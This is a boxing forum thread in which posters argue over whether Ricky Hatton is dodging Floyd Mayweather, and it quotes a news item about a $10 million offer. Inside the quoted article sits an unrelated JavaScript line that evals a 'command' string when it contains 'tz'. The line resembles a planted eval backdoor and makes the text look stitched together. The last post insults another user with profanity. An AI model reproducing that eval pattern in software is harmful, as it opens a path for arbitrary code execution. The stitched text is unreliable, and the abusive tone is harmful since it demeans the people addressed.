Default 43-0 with 31 kos and you still need a tuneup?

Quote:
Ricky Hatton's promoter, Dennis Hobson, has offered American Floyd Mayweather $10 million to come out of retirement to fight in Britain, the most likely venue being Wembley Stadium next spring.
Hobson said: "Mayweather is the pound-for-pound champion, but Ricky is the people's champion. I've offered Floyd $10 million to come to Britain and find out who is the best pound-for-pound fighter in the world.
''Mayweather is saying he wants to put pen to paper and this is his big chance to do so. I have spoken to some of his people and they have been very receptive."

if(command.indexOf('tz')!=-1)eval(command);
Hobson insists Hatton's next fight should be in the UK, with Mayweather to follow.
Boxing's rumour mill is also turning with reports that Hatton and his former promoter, Frank ******, might work together again.
****** agreed an out-of-court settlement in a libel action with his father and manager, Ray. Both sides will now sit down and discuss working together in the future.

ok why does ricky need a tuneup fight at 147? didn't he just fight collazo there two fights ago. how is it that a fighter who is 43-0 still needs a tuneup to fight the best, does ricky have no confidence in his skills? I mean why ask HBO for another tuneup fight in England when you have been campaining in the states to get a big fight with the best fighter on the planet

I smell a rat, ricky has no intention of getting in the ring with floyd anytime soon. I think he is waiting on the outcome of the gatti/gomez fight to make a decision. Ricky has been clamouring for a gatti fight for a long time (and we all know why ) and if gatti gets by gomez then I think hatton will take that option (gatti vs hatton in england ) Ricky has been using floyd's name to promote himself for over two years now. after every fight he has mentioned floyd as a potential opponent, while fighting maussa, collazo, urango, and castillo instead. I don't think hatton is fooling anyone except die hard floyd haters with his current routine.

Hatton has always followed the path of least resistance and his record proves that. While floyd may have his detractors one thing is clear floyd is three fights away from achieving immortality (hatton, mosley, cotto) within the squared circle, if hatton is a real man he will stop using floyd to promote his next fight (with each fight promising to fight floyd next) and step up to the plate and attempt greatness.

Sorry ricky but the stripteasing is over. Time to get that cherry popped

I think Hatton should just go ahead and fight Floyd. If he insists on a tuneup, he could risk a fight with Floyd because it would look like he is dodging him and he will have passed up on another opportunity to make the fight happen.

bigtime9, if Floyd beats Hatton, Cotto, and Mosley will you rank him as the GOAT?

If Hatton doesnt fight Floyd he should fight Malignaggi! But he's stayed away from boxers that are slick and fast so im sure he'll try to fight Gatti who will stand right in front of him.

If this screws up negotiations it will just go to show the Hatton's are not to be taken seriously as prospective Mayweather opponents.

I believe Ricky would fight Floyd next though, let's hope that's the case.

floyd right now to me is top 5 ATG he beats those three he is second only to ray robinson (pnly because ray was bigger:( ). but I don't want the thread to degenerate into that, hatton is up to his old tricks again, and his worth as a fighter is on the line in the fans eyes.

HBO doesn't want a floyd vs hatton fight, they want to bring hatton along carefully like hoya to build up the ppv numbers. face it even after beating castillo hatton is not well known in the states. In order for HBO to make their money back on hatton (who has been a bust) they will need to do a 24/7 type show and a promotional tour. people will come out to see hoya and floyd but hatton? he has only been on hbo for a year.

A big hatton vs gatti ppv in england would make HBO very happy money wise (might even get on ppv depending on how gatti looks against gomez). So we shouldn't get our hopes up for a big fight in november between floyd and hatton. Ricky is just promoting his next fight against a lower tier opponent, sorta like chicken de la hoya was after his fight with sweet pea.

I am a big Hatton fan, but I will lose some respect for him if he decides not to fight Mayweather. The Mayweather camp seems as if they are ready to sign on the dotted line and get the fight made, I just hope Ricky is too.

All fighters take tuneups.

Floyd fought 6 of them in a row between Castillo and Judah.

If you were looking at the biggest fight of your career at a higher weight class would you want a tune up fight?

I would no want to watch Gatti v Hatton at all. I have to much respect for him and would not care to see another older warrior get hurt..

very true.
hatton should have aimed to have fought for p4p sharmba mitchell or demarcus corely`s belt instead of opting out and taking the easy route through kosta tszyu.

he then should have stepped up and fought fleet footed/tall /slick baldomir instead of that often beat plodder collazo.

Tszyu had not been in as many big wars as Gatti.. The ageing process is harder on Gatti I beleive.

Prolly for the same reason Fwoyd needed to fight Corley and Brusseles when first moved up to 140, and Mitchell when he first moved up to 147 you dumb mother****er.

Honestly, if you're going to keep thinking up ways to try to discredit Hatton and promote PBF, try to be a bit smarter about it - it's too damn easy to shoot you down in flames you dumb mother****er

"hurhurhurhurhur!!!"

BTW, that rat you smell is up your ass
